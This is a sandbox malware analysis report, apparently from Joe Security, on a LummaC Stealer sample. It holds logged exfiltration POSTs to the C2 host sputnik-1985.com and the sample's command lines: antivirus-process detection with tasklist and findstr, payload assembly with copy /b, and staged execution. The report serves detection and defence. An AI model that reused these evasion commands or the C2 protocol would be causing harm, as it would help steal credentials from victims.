2025-01-10 11:06:26 UTC	1131	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=135dpe2hcis15k4t4hpddfs3mg; expires=Tue, 06 May 2025 04:53:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrybH0NmA8RnhNMTJEB1x%2FGw2hwDjENNWQL%2Fpk8Ch8ul%2BAtQVxAFc7kV%2FKhRib387dlrd78Kcu6vh0d6ZZnRZpvkPwOJfHzIJNlP4TOCgKetRXpgOkurUJvbG%2Bgqry7Fbb%2F1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc3298684d42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1672&rtt_var=653&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19125&delivery_rate=1643218&cwnd=240&unsent_bytes=0&cid=c97e050cdf07163d&ts=662&x=0"
2025-01-10 11:06:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 11:06:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:27 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=46BGISZ6K1JZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8755 Host: sputnik-1985.com
2025-01-10 11:06:27 UTC	8755	OUT	Data Raw: 2d 2d 34 36 42 47 49 53 5a 36 4b 31 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 34 36 42 47 49 53 5a 36 4b 31 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 36 42 47 49 53 5a 36 4b 31 4a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 34 36 42 47 49 53 5a Data Ascii: --46BGISZ6K1JZContent-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--46BGISZ6K1JZContent-Disposition: form-data; name="pid"2--46BGISZ6K1JZContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--46BGISZ
2025-01-10 11:06:27 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h77bih3t3e7v1iotvjreg6a6qi; expires=Tue, 06 May 2025 04:53:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6599s7dDZ5WDxbEy9SMX2An95310K6f8Xhj6%2FGnC321aVJ%2BdxqWAycfhvby8RxWOGNDUy9H9ntpW5Bzal2KDd7PINxRY8I1cURSDGVAcyAvZRp4tBLm9TDMUdO5AiIDtdasw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc329ff975de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1639&min_rtt=1635&rtt_var=622&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9688&delivery_rate=1748502&cwnd=242&unsent_bytes=0&cid=7c4291fad84a4432&ts=469&x=0"
2025-01-10 11:06:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 11:06:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:28 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K7J331VRLLP83P6P User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: sputnik-1985.com
2025-01-10 11:06:28 UTC	15331	OUT	Data Raw: 2d 2d 4b 37 4a 33 33 31 56 52 4c 4c 50 38 33 50 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4b 37 4a 33 33 31 56 52 4c 4c 50 38 33 50 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 37 4a 33 33 31 56 52 4c 4c 50 38 33 50 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 Data Ascii: --K7J331VRLLP83P6PContent-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--K7J331VRLLP83P6PContent-Disposition: form-data; name="pid"3--K7J331VRLLP83P6PContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a36
2025-01-10 11:06:28 UTC	5101	OUT	Data Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2025-01-10 11:06:28 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d8r689lhavqkikujukufhnvdve; expires=Tue, 06 May 2025 04:53:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GRzR9%2FBo5iDu2ckGA9ZIynP%2BmPAJGnvsxszkiKglhmdSArwmkAaS1ZNpuWj8Rfwyrvrj%2F0JKiYbkrEyfUTdNnbmAg6MEdP03EBdqEdiTTGXrR7bsrAoIOEpK5BQwRYhfsPS%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc32a769797c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1929&rtt_var=727&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21392&delivery_rate=1501285&cwnd=218&unsent_bytes=0&cid=bac2d0c43e75822b&ts=657&x=0"
2025-01-10 11:06:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 11:06:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:29 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UUC0SH7V04Z9YMTETJP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1290 Host: sputnik-1985.com
2025-01-10 11:06:29 UTC	1290	OUT	Data Raw: 2d 2d 55 55 43 30 53 48 37 56 30 34 5a 39 59 4d 54 45 54 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 55 55 43 30 53 48 37 56 30 34 5a 39 59 4d 54 45 54 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 55 43 30 53 48 37 56 30 34 5a 39 59 4d 54 45 54 4a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 Data Ascii: --UUC0SH7V04Z9YMTETJPContent-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--UUC0SH7V04Z9YMTETJPContent-Disposition: form-data; name="pid"1--UUC0SH7V04Z9YMTETJPContent-Disposition: form-data; name="lid"HpOoIh--3f
2025-01-10 11:06:30 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r1lgfh66rhcn7uf04mmrr39dt7; expires=Tue, 06 May 2025 04:53:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90wzZSKkNcfliApXnLkyse7%2BLs5%2BCYr8i9LAUf5xGj7%2F%2BJxarJub%2BdfaPekrRk6TN8NEFgTfPYshinafmU3PwNE%2Fcshss3t7LPDLnoElYiilNzBVNJeuOCrP4V3AG5tUdxvX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc32af8a258ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1963&rtt_var=747&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2208&delivery_rate=1454907&cwnd=168&unsent_bytes=0&cid=b85ff89b220d0042&ts=449&x=0"
2025-01-10 11:06:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 11:06:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:30 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=N7PIYC5OW1AEA03O2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1135 Host: sputnik-1985.com
2025-01-10 11:06:30 UTC	1135	OUT	Data Raw: 2d 2d 4e 37 50 49 59 43 35 4f 57 31 41 45 41 30 33 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4e 37 50 49 59 43 35 4f 57 31 41 45 41 30 33 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 37 50 49 59 43 35 4f 57 31 41 45 41 30 33 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 Data Ascii: --N7PIYC5OW1AEA03O2Content-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--N7PIYC5OW1AEA03O2Content-Disposition: form-data; name="pid"1--N7PIYC5OW1AEA03O2Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
2025-01-10 11:06:31 UTC	1125	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o5fdh5gqos3053mnibgmjl9rd1; expires=Tue, 06 May 2025 04:53:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPL2om7510x7%2BkY8SLJsakuYGxUNASTN2kuglXsQiZT08zGyWT8YB1SmiAg9EWwiivYErId6CU%2Byb6dhDIdOViPQWtie8JDyX5Tbdfpe8WAyDeMg1ZQsPEaCOPJOj%2FPvAD%2Bg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc32b5bb2dde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1650&rtt_var=637&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2051&delivery_rate=1692753&cwnd=242&unsent_bytes=0&cid=ba5dc84a61a3c044&ts=1204&x=0"
2025-01-10 11:06:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 11:06:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	104.21.64.1	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:32 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 121 Host: sputnik-1985.com
2025-01-10 11:06:32 UTC	121	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=0291758F5FC49A8DE9E2F0D64B3B48BA
2025-01-10 11:06:32 UTC	1132	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 11:06:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k5gmhudvqm6g0uiladb366hcbb; expires=Tue, 06 May 2025 04:53:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G11beuzAlnFPBwqs7G1xxt%2BY%2BPncewTRSX%2By377dVZk9dEj96X2wuC7c7W2LhjFWlnVN9ffKYKvmTOIj4M3%2F4%2FimSfFRlI9%2BRPwELxa8Y9KL%2FpUjJT4v3%2Bw7EwAr6Hv86ulH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc32c06e55c358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1659&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1638608&cwnd=155&unsent_bytes=0&cid=97aad50b73fe15ec&ts=468&x=0"
2025-01-10 11:06:32 UTC	54	IN	Data Raw: 33 30 0d 0a 51 34 50 43 39 42 4e 30 61 37 75 47 46 6f 35 66 79 38 78 69 54 44 64 71 49 67 70 6a 6a 36 6c 5a 6b 43 6d 38 6d 39 6e 31 4b 30 6b 59 33 67 3d 3d 0d 0a Data Ascii: 30Q4PC9BN0a7uGFo5fy8xiTDdqIgpjj6lZkCm8m9n1K0kY3g==
2025-01-10 11:06:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	06:05:53
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\HouseholdsClicking.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HouseholdsClicking.exe"
Imagebase:	0x400000
File size:	1'051'945 bytes
MD5 hash:	C3C0FBE6393929C60E63885BAB2603F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:05:54
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:05:54
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:05:57
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xde0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:05:57
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x7ff7699e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:05:57
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xde0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:05:57
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x470000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:05:58
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 19152
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:05:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Bookmarks" Sv
Imagebase:	0x470000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:05:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:05:59
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\19152\Appliance.com
Wow64 process (32bit):	true
Commandline:	Appliance.com M
Imagebase:	0xdc0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:05:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x780000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	25

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
